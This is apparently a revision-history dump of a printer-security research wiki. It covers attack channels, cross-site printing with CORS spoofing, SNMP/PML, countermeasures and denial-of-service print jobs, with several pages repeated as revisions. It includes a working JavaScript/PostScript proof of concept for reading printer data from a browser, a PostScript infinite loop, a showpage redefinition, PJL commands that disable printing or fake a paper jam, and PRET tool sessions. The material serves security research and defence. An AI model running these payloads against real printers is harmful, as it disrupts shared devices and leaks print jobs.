2017-01-31T08:35:52Z

84.153.135.37:

[[File:USB-deployment-channel.png|thumb|160px|Printing over USB]]

Data can be sent to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly from an USB device. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities.  

'' '''Is your copy room always locked?''' ''

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]]

Cross-site printing

2017-01-31T08:33:14Z

84.153.135.37: /* Proof-of-concept */

Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier.

[[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]]

== Enhanced cross-site printing ==

Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. A schematic overview of the attack is given below:

[[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]]

In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below:

<syntaxhighlight lang=postscript>
job = "\x1B%-12345X\r\n"
+ "%!\r\n"
+ "(HTTP/1.0 200 OK\\n) print\r\n"
+ "(Server: PostScript HTTPD\\n) print\r\n"
+ "(Access-Control-Allow-Origin: *\\n) print\r\n"
+ "(Connection: close\\n) print\r\n"
+ "(Content-Length: ) print\r\n"
+ "product dup length dup string cvs print\r\n"
+ "(\\n\\n) print\r\n"
+ "print\r\n"
+ "(\\n) print flush\r\n"
+ "\x1B%-12345X\r\n";

var x = new XMLHttpRequest();
x.open("POST", "http://printer:9100");
x.send(job);
x.onreadystatechange = function() {
if (x.readyState == 4)
alert(x.responseText);
};
</syntaxhighlight>

== Limitations of cross-site printing ==

Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time.

If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers:

* Cross-protocol access to LPD and FTP ports is blocked by various web browsers
* Parameters for direct printing over the embedded web server are model-specific
* The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types

A comparison of cross-site printing channels is given in below:

{| class="wikitable" style="text-align:center"
|-
! Channel !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by
|-
| Raw || - || ✔ || ✔ || -
|-
| Web || ✔ || - || - || -
|-
| IPP || ✔ || - || ✔ || -
|-
| LPD || ✔ || - || ✔
| style="text-align:left;" | FF, Ch, Op
|-
| FTP || ✔ || - || ✔
| style="text-align:left;" | FF, Ch, Op, IE
|-
|}

One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before.

== Proof-of-concept ==

A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer.

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]]

----

LPD

2017-01-31T08:32:36Z

84.153.135.37:

[[File:LPD-deployment-channel.png|thumb|180px|Printing over LPD]]

The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 80s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. The ''lpdprint'' tool included in [[PRET]] is a minimalist way to print data directly to an LPD capable printer as shown below:

lpdprint.py hostname filename

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]]

----

LPD

2017-01-31T08:30:59Z

84.153.135.37:

[[File:LPD-deployment-channel.png|thumb|180px|Printing over LPD]]

The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. The ''lpdprint'' tool included in [[PRET]] is a minimalist way to print data directly to an LPD capable printer as shown below:

lpdprint.py hostname filename

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]]

----

SMB

2017-01-31T08:29:45Z

84.153.135.37:

[[File:SMB-deployment-channel.png|thumb|180px|Printing over SMB]]

Server Message Block (SMB) is an application-layer network protocol for file and printer sharing originally developed by IBM in the mid-80s. It is the default method used by Windows based computers to share files and printers <ref>''[https://technet.microsoft.com/en-us/library/cc939973.aspx Common Internet File System]'', Microsoft TechNet Library</ref>. A free implementation is available with the [https://en.wikipedia.org/wiki/Samba_%28software%29 Samba] project. Some network printers bring their own SMB server – usually running on port 445/tcp – which, just like to [[LPD]], [[IPP]] and [[raw]] port 9100 printing, can be abused as a carrier for malicious PostScript or PJL files. In the Windows world, printing directly (without any ‘printer drivers’ interfering and converting the file) to a shared printer can be done as follows:

C:\> copy /b file \\server\share

...where <code>server</code> is either the printer itself, if it supports direct printing over SMB, or a separate computer system connected to the device and <code>share</code> is the name of the printer share. In the UNIX world, directly sending a file to an SMB printer share can be achived with the ''smbclient'' or the ''smbspool'' command from the samba(7) suite:

smbclient [-N|-U user] //server/share -c "print file"
smbspool smb://[user:pass]@server/share 0 user title 1 "" file

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]]

----

IPP

2017-01-31T08:27:31Z

84.153.135.37:

[[File:IPP-deployment-channel.png|thumb|180px|Printing over IPP]]

Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 <ref>''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> and RFC2911 <ref>''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000</ref>. IPP is an extendable protocol, for example ‘IPP Everywhere’ as specified in <ref>''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013</ref> is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing <ref>''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016</ref> have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. To submit a print job or to retrieve status information from the printer, an HTTP ''POST'' request is sent to the IPP server listening on port 631/tcp. A famous open-source IPP implementation is ''CUPS'' <ref>''[http://www.cups.org/ Common Unix Printing System]'', M. Sweet</ref>, which is the default printing system in many Linux distributions and OS X. Network printers usually run their own IPP server as one method to accept print jobs. Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is no further exploited except for [[Accounting bypass|accounting bypasses]].

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]]



----

Countermeasures

2017-01-31T08:25:20Z

84.153.135.37: /* Vendors */

Most attacks against printers are enabled because there is no clear distinction between [[Fundamentals#Page_Description_Languages|page description]] and [[Fundamentals#Printer_Control_Languages|printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks.

== Vendors ==

Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like [[PostScript]] from one day to the next would break compatibility with existing printer drivers, and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented [[PJL]] extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their ‘hidden functions’ and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device.

Code signing however also means technically restricting users to run vendor software <ref>This issue has also been discussed by the FSF when HP announced to introduce code signing for their printers: ‘[https://www.fsf.org/blogs/licensing/restricted-printers Fixing rogue printers: don't trade one security threat for another]’</ref>. Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers.

== Admins ==

Network administrators should never leave their printers accessible from the Internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. The print server should completely ignore PJL commands and convert PostScript code to another page description language or to a ‘defused’ version using CUPS' ''ps2write'' filter and disallow access to raw print queues. Printers should be completely sandboxed, isolating them from the rest of the network to mitigate the harm in case they are rooted. It must however be noted that print servers themselves can be a target of attacks, for example using the techniques discussed in [[Beyond Printers]]. A schematic view of the VLAN sandboxing approach is given below:

[[File:Dedicated-print-server.png|600px|Dedicated print server as a countermeasures to sandbox printers]]

Furthermore, if supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques.

== Users ==

Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator as they may be traces of a [[cross-site printing]] attack. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data.

----

SNMP

2017-01-31T08:21:51Z

84.153.135.37:

The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). A MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below:

<syntaxhighlight lang=sh>
snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1
iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250"
</syntaxhighlight>

While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands.

→ ''Related articles:'' [[PML]]

-----------

SNMP

2017-01-31T08:20:33Z

84.153.135.37:

The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). An MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below:

<syntaxhighlight lang=sh>
snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1
iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250"
</syntaxhighlight>

While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands.

→ ''Related articles:'' [[PML]]

-----------

PML

2017-01-31T08:20:11Z

84.153.135.37:

'''TBD: This article needs further explanation'''

The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released, however parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines defines PML as ‘an object-oriented request-reply printer management protocol’ <ref>''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11</ref> and gives an introduction to the basics of the syntax. PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp), but an attacker is still able to print using one of the various techniques discussed in [[deployment channels]]. The use of PML within a print job retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below:

<syntaxhighlight lang=sh>
> @PJL DMINFO ASCIIHEX="000006030302010301"
< "8000000603030201030114106870204c617365724a65742034323530
</syntaxhighlight>

The rear part of string responded by the printer, <code>6870204c617365724a65742034323530</code> is hexadecimal for <code>hp LaserJet 4250</code> – equivalent to the [[SNMP|snmpget example]]. As can be seen, it is possible to invoke (a subset of) SNMP commands over PJL via PML. A security-sensitive use of PML is to reset HP printers to [[factory defaults]] via ordinary print jobs, therefore removing protection mechanisms like user-set passwords.

→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[SNMP]], [[Factory defaults]]

-----------

PML

2017-01-31T08:15:11Z

84.153.135.37:

'''TBD: This article needs further explanation'''

The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released, however parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines defines PML as ‘an object-oriented request-reply printer management protocol’ <ref>''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11</ref> and gives an introduction to the basics of the syntax. PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp), but an attacker is still able to print using one of the various techniques discussed in [[deployment channels]]. The use of PML within a print job retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below:

<syntaxhighlight lang=sh>
> @PJL DMINFO ASCIIHEX="000006030302010301"
< "8000000603030201030114106870204c617365724a65742034323530
</syntaxhighlight>

The rear part of string responded by the printer, <code>6870204c617365724a65742034323530</code> is hexdecimal for <code>hp LaserJet 4250</code> – equivalent to the [[SNMP|snmpget example]]. As one can see, with PML it is possible to invoke (a subset of) SNMP commands over PJL. One security-sensitve use of PML is to to reset HP printers to [[factory defaults]] via ordinary print jobs, therefore removing protection mechanisms like user-set passwords.

→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[SNMP]], [[Factory defaults]]

-----------

Document processing

2017-01-31T08:09:36Z

84.153.135.37: /* Infinite loops */

Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] can be used to upload permanent macros or fonts until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed.

== PostScript ==

=== Infinite loops ===

One trivial example of an infinite loop written in PostScript is given below:

<syntaxhighlight lang=postscript>
%!
{} loop
</syntaxhighlight>

This minimalist document keeps a PostScript interpreter busy forever. In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel, while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent.

'''How to test for this attack?'''

Use [[PRET]]'s ''hang'' command in ''ps'' mode:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> hang
Warning: This command causes an infinite loop rendering the
device useless until manual restart. Press CTRL+C to abort.
Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

=== Redefine showpage ===

Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]]. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below:

<syntaxhighlight lang=postscript>
true 0 startjob
/showpage {} def
</syntaxhighlight>

'''How to test for this attack?'''

Use [[PRET]]'s ''disable'' command in ''ps'' mode:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> disable
Disabling printing functionality

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PJL ==

=== PJL jobmedia ===

Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below:

@PJL SET SERVICEMODE=HPBOISEID
@PJL DEFAULT JOBMEDIA=OFF

'''How to test for this attack?'''

Use [[PRET]]'s ''disable'' command in ''pjl'' mode:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> disable
Printing functionality: OFF

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

=== Offline mode ===

In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below:

@PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS"

The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the ''online'' button on the control panel.

'''How to test for this attack?'''

Use [[PRET]]'s ''offline'' command in ''pjl'' mode:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> offline "MESSAGE TO DSIPLAY"
Warning: Taking the printer offline will prevent yourself and others
from printing or re-connecting to the device. Press CTRL+C to abort.
Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----

Document processing

2017-01-31T08:07:57Z

84.153.135.37:

Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] can be used to upload permanent macros or fonts until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed.

== PostScript ==

=== Infinite loops ===

One trivial example of an infinite loop written in PostScript is given below:

<syntaxhighlight lang=postscript>
%!
{} loop
</syntaxhighlight>

This minimalist document keeps a PostScript interpreter busy forever. In an evalation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent.

'''How to test for this attack?'''

Use [[PRET]]'s ''hang'' command in ''ps'' mode:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> hang
Warning: This command causes an infinite loop rendering the
device useless until manual restart. Press CTRL+C to abort.
Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

=== Redefine showpage ===

Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]]. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below:

<syntaxhighlight lang=postscript>
true 0 startjob
/showpage {} def
</syntaxhighlight>

'''How to test for this attack?'''

Use [[PRET]]'s ''disable'' command in ''ps'' mode:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> disable
Disabling printing functionality

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PJL ==

=== PJL jobmedia ===

Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below:

@PJL SET SERVICEMODE=HPBOISEID
